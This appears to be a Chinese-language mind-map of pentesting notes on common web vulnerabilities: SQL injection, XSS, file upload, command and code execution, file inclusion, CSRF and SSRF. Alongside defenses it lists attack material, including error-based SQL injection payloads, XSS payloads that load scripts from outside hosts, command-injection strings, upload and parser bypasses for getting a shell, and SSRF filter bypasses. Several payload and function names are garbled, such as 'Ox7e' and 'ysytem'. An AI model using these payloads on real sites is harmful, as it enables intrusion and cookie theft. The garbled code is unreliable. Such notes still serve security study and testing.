Web常见漏洞
2022-10-09 19:46:38 0 举报AI智能生成
根据web漏洞常见类型,整理了漏洞的利用条件、挖掘方法、常用代码等
作者其他创作
大纲/内容
SQL注入
注入点查找
and1=1/and1=2(整型)
随机输入(整型)
-1/+1回显上下页(整型)
单引号(字符型整型)
and sleep(5)(判断页面返回时间)
注入分类
根据语法
可联合查询注入
前提
能使用union
页面必须有显示位
注入步骤
找到注入点并判断闭合字符
判断数据库类型
猜解列数,爆显示位
得到基本信息(如数据库名、数据库版本等)
清解表名
得到列名
得到列值
报错型注入
前提
页面没有显示位
源码使用了echo mysqlerror(输出了错误信息
注入速度快、语句复杂、不能使用group_.concat0,只能用limit依次清解
注入手法
?id=2'and (select 1 from (select count(*),concat(floor(rand(0)*2).(select (select 报错语句)from information_schema.tables limit0,1)x from
information_schema.tables group by )a )-
?id=2'and updatexml(1,concat(Ox7e,(SELECT @@version),0x7e),1)
?id=1+and extractvalue(1,concat(Ox7e,(select @@version),0x7e))
使用公式依次替换语句即可,后续步骤和union注入一样
布尔型注入
前提
页面存在注入但是没有显示位且源码没有使用echo mysql_error(输出错误信息
注入手法
?id=1and注入语句)-+根据返回结果是否相同来得到数据
主要利用了length0、asci0、substr0得到结果
基于时间延迟注入
根据页面返回时间的不同来得到数据
多语句查询
只在MSSQL数据库存在
一个SQL语句后跟分号后再跟一个语句即可执行两个语句
根据类型
整型
字符串型
搜索型
注入位置
GET
POST
X-Forwarded-For
Cookie
User-Agent
XSS
危害
盗取管理员cookie
Xss蠕虫
挂马
网站重定向
修改网顶内容
攻击场景
各类SNS
邮件系统
BBS
微博
主要是一些大型社交网站
前提条件
反射型xss
一般是url参数中的值能回显到页面且url参数过滤不严
存储型xss
可以提交内容
提交的内容可被管理员或其他用户看到
提交的内容未被过滤或过滤不严
漏洞位置
在标签中<div>xss test</div>
在属性内<input type="text"name="content'"value="xss test'">
可以使用">xss test来测试
常见Payload
<script src='http://b.ioio.pub/xss/probe.js'></script>
<img src="http://a.com/xss/1.js"/>
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js'";>
XSS挖掘
手工检测
般先输入AAAA<>"&'()查看过滤了哪些字符
全自动XSS检测
APPSCAN、AWVS、Burp Suite、XSSER、XSSF
防御
过滤输入与输出
httponly
文件上传
常见可执行文件后缀:<br>php php2 php3 php5 phtml<br>asp aspx ascx ashx cer asa<br>jsp jspx
漏洞挖掘
找上传点,如头像、附件等的上传
找类似upload的脚本文件或目录
找编辑器目录
利用条件
首先,上传的文件可被执行
其次,用户在web可以访问到这个文件
最后,用户上传的文件未被压宿、格式化等改变内容
漏洞分类
配置不当直接getshell
本地上传被绕过
burp suite
服务端过滤被绕过
黑名单绕过
MIME绕过
截断上传
文件攻击
.htaccess
.user.ini
检测文件内容
文件幻数
00截断上传
文件解析漏洞
IIS解析漏洞
建立*.asp、*.asa格式的文件夹下的文件会以asp解析<br>
*.asp;1jpg会以asp解析
Apache解析漏洞
当Apache遇到不认识的扩展名时会依次向前解析,若都不认识测暴漏源码
Apache2.0.59|2.2.62.2.82.2.112.2.171有解析漏洞
Nginx解析漏洞
低版本的可在任意文件名后添加600.php进行解析
PHP CGI解析漏洞
前提条件:cgi,fix_pathinfo=1
IIS7/7.5中,a.com/x.txt/x.php的x.txt会被解析为php(在a.com/x.txt后添加x.php)
Nginxt也和IIS7一样,任意文件名任意文件名.php会被解析为php
开源编辑器上传漏洞
命令执行
利用条件
php中使用了ysytem、exec、shel_exec、passthru、popen、proc_popens等函数
用户可以控制函数中的参数
对用户参数未过滤或过滤不严
示例
system("$arg":/直接输入即可
system("bin/prog $arg"); //直接输入;ls
ystem("bin/prog -p $arg");//和上面一样
system("bin/prog -p=\"$arg\""); //可以输入";ls;"
system("bin/prog -p='$arg");/可以输入';ls;'
漏洞修复
少用执行命令的函数
参数值尽量用引号包括
对爹数过滤,对敏感字符进行过滤
代码执行
防御
不使用eval
对字符串进行转义
不使用preg_replacef的e修饰符,使用preg_replace_.callback替换
示例
www.xx.com/new/detail/id/{$_POST[xx]}}
漏洞挖掘
框架找漏洞
www.xx.com/news/show/id/124
漏洞利用点
执行代码的函数:eval、assert
callbackl函数:preg_replace + /e模式
反序列化(unserialize)
相关函数
php:eval、asert
python:exec
文件包含
函数
include
include once
require
require_once
利用条件
包含的文件中只要内容符合php规范,不管扩展名是什么都
会被php解析,不符合php规范测暴漏源码
漏洞分类
本地包含
上传图片马然后包含
读敏感文件
包含日志getshell
包含伪协议
远程包含
要保证allow_url_fopen和allow_url_includej为On
防御
php中配置open_basedir
过滤./\
禁止服务器远程文件包含
CSRF
防御
二次确认
Tokeni认证
Referer
漏洞类型
GET
POST
利用场景
有意义的操作(如修改密码)
验证过于简单(参数固定、我们可以设置参数)
利用条件
知道u所有参数项并了解其含义
诱导用户访问构造好的POC
SSRF
条件
服务端提供了从其他服务器获取资源的功能
服务端为对目标地址做严格过滤
漏洞挖掘
从web功能上
通过ur分享内容
文件处理、编码处理、转码
在线番翻译
通过u地址加载与下载图片
阁片、文章的收藏
设置邮件接收服务器
从url关键字寻找
share、wap、url、link、src、source、target、u、3g、display、sourceurl、.imageurl、.domain等
漏洞验证
请求一张图片,看发起请求的是谁
绕过
http://A.com@10.10.10.10=10.10.10.10
IP使用其他进制:127.0.0.1=2130706433
使用短地址:http://10.10.116.11=http://t.cn/RwbLKDx
端口绕过:ip后面加个端口
xip.io
10.0.0.1.xip.i0=10.0.0.1
www.10.0.0.1.xip.io=10.0.0.1
mysite.10.0.0.1.xip.io=10.0.0.1
foo.bar.10.0.0.1.xip.io=10.0.0.1
js跳转
0 条评论
下一页
